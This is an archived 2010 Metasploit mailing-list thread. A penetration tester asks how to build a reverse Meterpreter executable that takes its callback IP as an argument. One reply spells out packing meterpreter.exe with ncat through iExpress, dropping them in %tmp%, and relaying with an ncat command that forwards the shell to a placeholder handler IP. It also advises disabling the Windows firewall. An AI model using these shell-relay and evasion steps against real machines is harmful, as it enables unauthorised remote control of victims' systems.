Metasploit mailing list archives
Re: passing LHOST IP on command line
From: archeldeeb <archeldeeb () gmail com>
Date: Wed, 10 Nov 2010 16:36:56 +0300
glad you found it useful. Beware that even though you are after a reverse connection, this method will open a listening port at the target machine which will trigger any installed firewall, even window's one, so just as a reminder make sure windows firewall is turned off. good luck finding a way to do it without that side effect. Sherif eldeeb -----Original Message----- From: Robin Wood <robin () digininja org> Sent: 10 November, 2010 4:06 PM To: Sherif El-Deeb <archeldeeb () gmail com> Cc: framework () spool metasploit com; Oliver Kleinecke <okleinecke () web de> Subject: Re: [framework] passing LHOST IP on command line On 10 November 2010 13:02, Sherif El-Deeb <archeldeeb () gmail com> wrote:
Even though I have no smart answer, but I think you'll have to pack the meterpreter.exe with ncat.exe using iExpress and drop them at %tmp% or something, then do port forwarding: Multi/Handler : LPORT=4444 Meterpreter: LHOST=127.0.0.1 LPORT=9999 ncat -l 9999 -e "ncat MULTI_HANDLER_IP 4444" so, my final answer would be : one iExpress exe that contains meterpreter.exe that always connect to 127.0.0.1, ncat to do port forwarding and an optional dos batch file that will take themulti/handler's ip as a command argument "%1"
I'd say that was a pretty smart answer! If I don't get any ways to do it directly in the exe then this is what I'll be doing next time. And I agree that a batch file would be the best way to go. Robin
Regards, Sherif Eldeeb. On Wed, Nov 10, 2010 at 3:09 PM, Robin Wood <robin () digininja org> wrote:On 10 November 2010 11:40, Oliver Kleinecke <okleinecke () web de> wrote:I`d suggest to use the windows/meterpreter/reverse_tcp_dns payload, set its LHOST-value to a dyndns-name and set up a dyndns-client on your listener-host. Hope this helps =).Unfortunately on an internal test without internet access this won't help. Robinbest regards Oliver -----Ursprüngliche Nachricht----- Von: "Robin Wood" <robin () digininja org> Gesendet: 10.11.2010 11:41:28 An: "Metasploit List" <framework () spool metasploit com> Betreff: [framework] passing LHOST IP on command lineIs it possible to build a reverse meterpreter exe that will take its LHOST as a command line argument rather than being hard coded? The scenario I have is: Got command line access to a windows box through the windows psexec and managed to use tftp to bring files across to the compromised machine. I'd like to have generic 32 and 64 bit exes stored on my tftp server that I can copy across and then run them giving the IP of my multi handler machine. This just seems easier than having to compile a new exe on each job because my IP is different every time. Robin _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework___________________________________________________________ WEB.DE DSL Doppel-Flat ab 19,99 €/mtl.! Jetzt auch mit gratis Notebook-Flat! http://produkte.web.de/go/DSL_Doppel_Flatrate/2_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: passing LHOST IP on command line, (continued)
- Re: passing LHOST IP on command line Oliver Kleinecke (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Sherif El-Deeb (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Oliver Kleinecke (Nov 10)
- Re: passing LHOST IP on command line Jonathan Cran (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Message not available
- Re: passing LHOST IP on command line Kevin Shaw (Nov 10)
- Re: passing LHOST IP on command line Carlos Perez (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)
- Re: passing LHOST IP on command line Robin Wood (Nov 10)